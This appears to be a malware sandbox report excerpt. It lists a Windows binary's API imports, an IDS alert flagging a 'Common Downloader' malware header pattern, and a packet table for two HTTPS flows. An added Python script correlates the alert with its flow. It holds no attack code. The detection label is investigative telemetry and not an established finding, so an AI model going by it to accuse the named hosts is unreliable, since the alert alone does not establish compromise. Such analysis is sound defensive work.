USER32.dll | GetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll | SHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
ADVAPI32.dll | AdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
Language of compilation system | Country where language is spoken
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-04T10:50:43.162760+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.11.20 | 49732 | 142.251.40.206 | 443 | TCP
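The alert row above gives a 5-tuple and a timestamp; the packet table that follows is the flow it fired on, but the report does not join the two for you, and the timestamps are in different formats (ISO 8601 with a numeric offset for the alert, "Oct 4, 2024 10:50:42.616579056 CEST" with nanoseconds and a zone name for the packets). The following is an added example, not Joe Sandbox output: it parses both formats (truncating nanoseconds to the microseconds Python's `datetime` can hold and mapping the zone name by hand, since `%Z` does not recognise CEST), groups packets into bidirectional flows, attaches the alert to its flow and reports which packet lies closest to the alert time. The sample rows are copied from the two tables on this page and re-delimited with `|`; the assumption that the first packet seen for a 5-tuple is the client side is a heuristic that fails on captures that start mid-flow.

```python
# Added example (not Joe Sandbox output): pivot from an IDS alert to the TCP
# flow it fired on, using rows copied from the two tables on this page.
# Assumptions: packet timestamps carry nanoseconds plus a zone name, and the
# first packet seen for a 5-tuple is the client side.
import re
from datetime import datetime, timedelta, timezone

# Constructed sample: six rows from the packet table (two flows), '|'-delimited.
PACKET_LINES = """\
Oct 4, 2024 10:50:42.616579056 CEST | 49732 | 443 | 192.168.11.20 | 142.251.40.206
Oct 4, 2024 10:50:42.616679907 CEST | 443 | 49732 | 142.251.40.206 | 192.168.11.20
Oct 4, 2024 10:50:42.616904974 CEST | 49732 | 443 | 192.168.11.20 | 142.251.40.206
Oct 4, 2024 10:50:43.162919044 CEST | 443 | 49732 | 142.251.40.206 | 192.168.11.20
Oct 4, 2024 10:50:43.349034071 CEST | 49733 | 443 | 192.168.11.20 | 142.250.80.97
Oct 4, 2024 10:50:43.349165916 CEST | 443 | 49733 | 142.250.80.97 | 192.168.11.20
"""
# The single alert row from the IDS table, same field order as the report.
ALERT_LINES = """\
2024-10-04T10:50:43.162760+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.11.20 | 49732 | 142.251.40.206 | 443 | TCP
"""

TZ_HOURS = {"CEST": 2, "CET": 1, "UTC": 0, "GMT": 0}  # zone names the report prints
TS_RE = re.compile(r"(\w{3}) (\d{1,2}), (\d{4}) (\d\d):(\d\d):(\d\d)\.(\d+) (\w+)")


def parse_packet_ts(text: str) -> datetime:
    """'Oct 4, 2024 10:50:42.616579056 CEST' -> aware datetime.

    strptime's %f takes at most six digits and %Z does not know 'CEST', so the
    nanosecond field is truncated to microseconds and the zone is mapped by hand.
    """
    m = TS_RE.fullmatch(text.strip())
    if not m:
        raise ValueError(f"unrecognised timestamp: {text!r}")
    mon, day, year, hh, mm, ss, frac, zone = m.groups()
    micro = int(frac[:6].ljust(6, "0"))
    month = datetime.strptime(mon, "%b").month
    tz = timezone(timedelta(hours=TZ_HOURS[zone]))
    return datetime(int(year), month, int(day), int(hh), int(mm), int(ss), micro, tz)


def parse_packets(text: str) -> list:
    pkts = []
    for line in text.splitlines():
        if line.strip():
            ts, sport, dport, sip, dip = (f.strip() for f in line.split("|"))
            pkts.append((parse_packet_ts(ts), sip, int(sport), dip, int(dport)))
    return pkts


def parse_alerts(text: str) -> list:
    alerts = []
    for line in text.splitlines():
        if line.strip():
            ts, sid, sig, sev, sip, sport, dip, dport, proto = (f.strip() for f in line.split("|"))
            alerts.append({"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%f%z"),
                           "sid": int(sid), "signature": sig, "severity": int(sev),
                           "src": (sip, int(sport)), "dst": (dip, int(dport)), "proto": proto})
    return alerts


def build_flows(pkts: list) -> dict:
    """Group packets into flows keyed (client_ip, client_port, server_ip, server_port)."""
    flows = {}
    for ts, sip, sport, dip, dport in pkts:
        fwd, rev = (sip, sport, dip, dport), (dip, dport, sip, sport)
        if rev in flows:
            key, direction = rev, "to_client"
        else:
            key, direction = fwd, "to_server"
            flows.setdefault(key, {"to_server": 0, "to_client": 0, "packets": []})
        flows[key][direction] += 1
        flows[key]["packets"].append((ts, direction))
    for f in flows.values():
        f["first"], f["last"] = f["packets"][0][0], f["packets"][-1][0]
        f["duration_ms"] = (f["last"] - f["first"]).total_seconds() * 1000
    return flows


def correlate(alerts: list, flows: dict) -> list:
    """Attach each alert to the flow carrying its 5-tuple (either direction) and
    report the packet closest in time to the alert, normally the one that matched."""
    out = []
    for a in alerts:
        key = a["src"] + a["dst"]
        if key not in flows:
            key = a["dst"] + a["src"]
        flow = flows.get(key)
        if flow is None:
            out.append({"sid": a["sid"], "flow": None})
            continue
        nearest_ts, direction = min(flow["packets"],
                                    key=lambda p: abs((p[0] - a["ts"]).total_seconds()))
        out.append({"sid": a["sid"], "flow": key,
                    "offset_ms": (a["ts"] - flow["first"]).total_seconds() * 1000,
                    "nearest_packet": direction,
                    "gap_us": abs((nearest_ts - a["ts"]).total_seconds()) * 1e6})
    return out


if __name__ == "__main__":
    flows = build_flows(parse_packets(PACKET_LINES))
    for key, f in flows.items():
        print(f"{key[0]}:{key[1]} -> {key[2]}:{key[3]}  "
              f"{f['to_server']} up / {f['to_client']} down  {f['duration_ms']:.1f} ms")
    for hit in correlate(parse_alerts(ALERT_LINES), flows):
        print(hit)
```

On the rows used here the alert lands 546 ms into the 49732 to 142.251.40.206:443 flow, 159 microseconds from the server-to-client packet at 10:50:43.162919; feeding the whole packet table (all 49732 and 49733 rows) through the same functions gives per-direction packet counts and flow durations for both connections.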
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 4, 2024 10:50:42.616579056 CEST | 49732 | 443 | 192.168.11.20 | 142.251.40.206
Oct 4, 2024 10:50:42.616679907 CEST | 443 | 49732 | 142.251.40.206 | 192.168.11.20
Oct 4, 2024 10:50:42.616904974 CEST | 49732 | 443 | 192.168.11.20 | 142.251.40.206
Oct 4, 2024 10:50:42.643475056 CEST | 49732 | 443 | 192.168.11.20 | 142.251.40.206
Oct 4, 2024 10:50:42.643517017 CEST | 443 | 49732 | 142.251.40.206 | 192.168.11.20
Oct 4, 2024 10:50:42.895818949 CEST | 443 | 49732 | 142.251.40.206 | 192.168.11.20
Oct 4, 2024 10:50:42.896049023 CEST | 49732 | 443 | 192.168.11.20 | 142.251.40.206
Oct 4, 2024 10:50:42.897382975 CEST | 443 | 49732 | 142.251.40.206 | 192.168.11.20
Oct 4, 2024 10:50:42.897641897 CEST | 49732 | 443 | 192.168.11.20 | 142.251.40.206
Oct 4, 2024 10:50:42.955472946 CEST | 49732 | 443 | 192.168.11.20 | 142.251.40.206
Oct 4, 2024 10:50:42.955573082 CEST | 443 | 49732 | 142.251.40.206 | 192.168.11.20
Oct 4, 2024 10:50:42.956748962 CEST | 443 | 49732 | 142.251.40.206 | 192.168.11.20
Oct 4, 2024 10:50:42.956950903 CEST | 49732 | 443 | 192.168.11.20 | 142.251.40.206
Oct 4, 2024 10:50:42.963362932 CEST | 49732 | 443 | 192.168.11.20 | 142.251.40.206
Oct 4, 2024 10:50:43.004363060 CEST | 443 | 49732 | 142.251.40.206 | 192.168.11.20
Oct 4, 2024 10:50:43.162919044 CEST | 443 | 49732 | 142.251.40.206 | 192.168.11.20
Oct 4, 2024 10:50:43.163104057 CEST | 49732 | 443 | 192.168.11.20 | 142.251.40.206
Oct 4, 2024 10:50:43.163177967 CEST | 443 | 49732 | 142.251.40.206 | 192.168.11.20
Oct 4, 2024 10:50:43.163341045 CEST | 49732 | 443 | 192.168.11.20 | 142.251.40.206
Oct 4, 2024 10:50:43.163353920 CEST | 443 | 49732 | 142.251.40.206 | 192.168.11.20
Oct 4, 2024 10:50:43.163554907 CEST | 49732 | 443 | 192.168.11.20 | 142.251.40.206
Oct 4, 2024 10:50:43.164568901 CEST | 49732 | 443 | 192.168.11.20 | 142.251.40.206
Oct 4, 2024 10:50:43.164648056 CEST | 443 | 49732 | 142.251.40.206 | 192.168.11.20
Oct 4, 2024 10:50:43.349034071 CEST | 49733 | 443 | 192.168.11.20 | 142.250.80.97
Oct 4, 2024 10:50:43.349165916 CEST | 443 | 49733 | 142.250.80.97 | 192.168.11.20
Oct 4, 2024 10:50:43.349370003 CEST | 49733 | 443 | 192.168.11.20 | 142.250.80.97
Oct 4, 2024 10:50:43.349488020 CEST | 49733 | 443 | 192.168.11.20 | 142.250.80.97
Oct 4, 2024 10:50:43.349545002 CEST | 443 | 49733 | 142.250.80.97 | 192.168.11.20
Oct 4, 2024 10:50:43.611007929 CEST | 443 | 49733 | 142.250.80.97 | 192.168.11.20
Oct 4, 2024 10:50:43.611376047 CEST | 49733 | 443 | 192.168.11.20 | 142.250.80.97
Oct 4, 2024 10:50:43.616281033 CEST | 49733 | 443 | 192.168.11.20 | 142.250.80.97
Oct 4, 2024 10:50:43.616321087 CEST | 443 | 49733 | 142.250.80.97 | 192.168.11.20
Oct 4, 2024 10:50:43.616982937 CEST | 443 | 49733 | 142.250.80.97 | 192.168.11.20
Oct 4, 2024 10:50:43.617198944 CEST | 49733 | 443 | 192.168.11.20 | 142.250.80.97
Oct 4, 2024 10:50:43.617400885 CEST | 49733 | 443 | 192.168.11.20 | 142.250.80.97
Oct 4, 2024 10:50:43.660187006 CEST | 443 | 49733 | 142.250.80.97 | 192.168.11.20
Oct 4, 2024 10:50:45.864609003 CEST | 443 | 49733 | 142.250.80.97 | 192.168.11.20
Oct 4, 2024 10:50:45.864830017 CEST | 49733 | 443 | 192.168.11.20 | 142.250.80.97
Oct 4, 2024 10:50:45.864830017 CEST | 49733 | 443 | 192.168.11.20 | 142.250.80.97
Oct 4, 2024 10:50:45.880912066 CEST | 443 | 49733 | 142.250.80.97 | 192.168.11.20
Oct 4, 2024 10:50:45.881268024 CEST | 49733 | 443 | 192.168.11.20 | 142.250.80.97
Oct 4, 2024 10:50:45.896915913 CEST | 443 | 49733 | 142.250.80.97 | 192.168.11.20
Oct 4, 2024 10:50:45.897089005 CEST | 49733 | 443 | 192.168.11.20 | 142.250.80.97
Oct 4, 2024 10:50:45.897089958 CEST | 49733 | 443 | 192.168.11.20 | 142.250.80.97
Oct 4, 2024 10:50:45.897144079 CEST | 443 | 49733 | 142.250.80.97 | 192.168.11.20
Oct 4, 2024 10:50:45.897408962 CEST | 49733 | 443 | 192.168.11.20 | 142.250.80.97
Oct 4, 2024 10:50:45.975327969 CEST | 443 | 49733 | 142.250.80.97 | 192.168.11.20
Oct 4, 2024 10:50:45.975550890 CEST | 49733 | 443 | 192.168.11.20 | 142.250.80.97
Oct 4, 2024 10:50:45.975630999 CEST | 443 | 49733 | 142.250.80.97 | 192.168.11.20
Oct 4, 2024 10:50:45.975923061 CEST | 49733 | 443 | 192.168.11.20 | 142.250.80.97
Oct 4, 2024 10:50:45.979456902 CEST | 443 | 49733 | 142.250.80.97 | 192.168.11.20
Oct 4, 2024 10:50:45.979688883 CEST | 49733 | 443 | 192.168.11.20 | 142.250.80.97
Oct 4, 2024 10:50:45.979770899 CEST | 443 | 49733 | 142.250.80.97 | 192.168.11.20
Oct 4, 2024 10:50:45.980041981 CEST | 49733 | 443 | 192.168.11.20 | 142.250.80.97
Oct 4, 2024 10:50:45.987548113 CEST | 443 | 49733 | 142.250.80.97 | 192.168.11.20
Oct 4, 2024 10:50:45.987771988 CEST | 49733 | 443 | 192.168.11.20 | 142.250.80.97
Oct 4, 2024 10:50:45.987869978 CEST | 443 | 49733 | 142.250.80.97 | 192.168.11.20
Oct 4, 2024 10:50:45.988076925 CEST | 49733 | 443 | 192.168.11.20 | 142.250.80.97
Oct 4, 2024 10:50:45.996140003 CEST | 443 | 49733 | 142.250.80.97 | 192.168.11.20
Oct 4, 2024 10:50:45.996357918 CEST | 49733 | 443 | 192.168.11.20 | 142.250.80.97
Oct 4, 2024 10:50:45.996448040 CEST | 443 | 49733 | 142.250.80.97 | 192.168.11.20
Oct 4, 2024 10:50:45.996710062 CEST | 49733 | 443 | 192.168.11.20 | 142.250.80.97
Oct 4, 2024 10:50:46.003535032 CEST | 443 | 49733 | 142.250.80.97 | 192.168.11.20
Oct 4, 2024 10:50:46.003786087 CEST | 49733 | 443 | 192.168.11.20 | 142.250.80.97
Oct 4, 2024 10:50:46.003870964 CEST | 443 | 49733 | 142.250.80.97 | 192.168.11.20
Oct 4, 2024 10:50:46.004156113 CEST | 49733 | 443 | 192.168.11.20 | 142.250.80.97
Oct 4, 2024 10:50:46.011831045 CEST | 443 | 49733 | 142.250.80.97 | 192.168.11.20
Oct 4, 2024 10:50:46.012042046 CEST | 49733 | 443 | 192.168.11.20 | 142.250.80.97
Oct 4, 2024 10:50:46.012130022 CEST | 443 | 49733 | 142.250.80.97 | 192.168.11.20
Oct 4, 2024 10:50:46.012350082 CEST | 49733 | 443 | 192.168.11.20 | 142.250.80.97
Oct 4, 2024 10:50:46.019759893 CEST | 443 | 49733 | 142.250.80.97 | 192.168.11.20
Oct 4, 2024 10:50:46.020015001 CEST | 49733 | 443 | 192.168.11.20 | 142.250.80.97
Oct 4, 2024 10:50:46.020095110 CEST | 443 | 49733 | 142.250.80.97 | 192.168.11.20
Oct 4, 2024 10:50:46.020333052 CEST | 49733 | 443 | 192.168.11.20 | 142.250.80.97
Oct 4, 2024 10:50:46.020970106 CEST | 443 | 49733 | 142.250.80.97 | 192.168.11.20
Oct 4, 2024 10:50:46.021250010 CEST | 49733 | 443 | 192.168.11.20 | 142.250.80.97
Oct 4, 2024 10:50:46.028736115 CEST | 443 | 49733 | 142.250.80.97 | 192.168.11.20
Oct 4, 2024 10:50:46.028954983 CEST | 49733 | 443 | 192.168.11.20 | 142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.029036999 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.029392958 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.035145998 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.035352945 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.035437107 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.035705090 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.042648077 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.042912006 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.042992115 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.043296099 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.050873995 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.051098108 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.051179886 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.051532984 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.057864904 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.058084965 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.058166981 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.058367968 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.064889908 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.065232992 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.068540096 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.068778992 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.068888903 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.069144011 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.087224007 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.087456942 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.087534904 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.087732077 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.089541912 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.089761972 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.089833021 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.090138912 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.096385002 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.096596003 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.096682072 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.096951008 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.102436066 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.102655888 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.102741957 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.103008032 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.108331919 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.108544111 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.108628035 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.108992100 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.114767075 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.114959955 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.115024090 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.115056038 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.115336895 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.119366884 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.119561911 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.119666100 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.119950056 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.124914885 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.125129938 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.125211000 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.125566006 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.130379915 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.130703926 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.130783081 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.131145000 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.136483908 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.136709929 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.136796951 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.137063980 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.144659996 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.144876957 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.144979954 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.145350933 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.147339106 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.147641897 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.150136948 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.150333881 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.150448084 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.150726080 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.150796890 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.151043892 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.156513929 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.156714916 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.156805992 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.157104015 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.161313057 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.161525011 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.161607027 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.161907911 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.167435884 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.167609930 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.167701960 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.168039083 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.174211025 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.174432993 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.174511909 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.174848080 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.177535057 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.177752972 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.177834988 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.178184986 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.182687044 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.182914972 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.182997942 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.183249950 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.187454939 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.187670946 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.187777042 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.188059092 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.193305969 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.193543911 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.193623066 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.193972111 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.198766947 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.198981047 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.199065924 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.199352980 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.203507900 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.203727961 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.203821898 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.204113960 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.206860065 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.207062960 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.207145929 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.207494020 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.209979057 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.210242033 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.211498976 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.211904049 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.211987972 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.212224960 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.214503050 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.214760065 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.214840889 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.215172052 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.217495918 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.217715025 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.217803001 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.218086958 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.220920086 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.335519075 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.335787058 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.335844994 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.336097002 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.337094069 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.337341070 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.337568045 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.337812901 CEST49733443192.168.11.20142.250.80.97
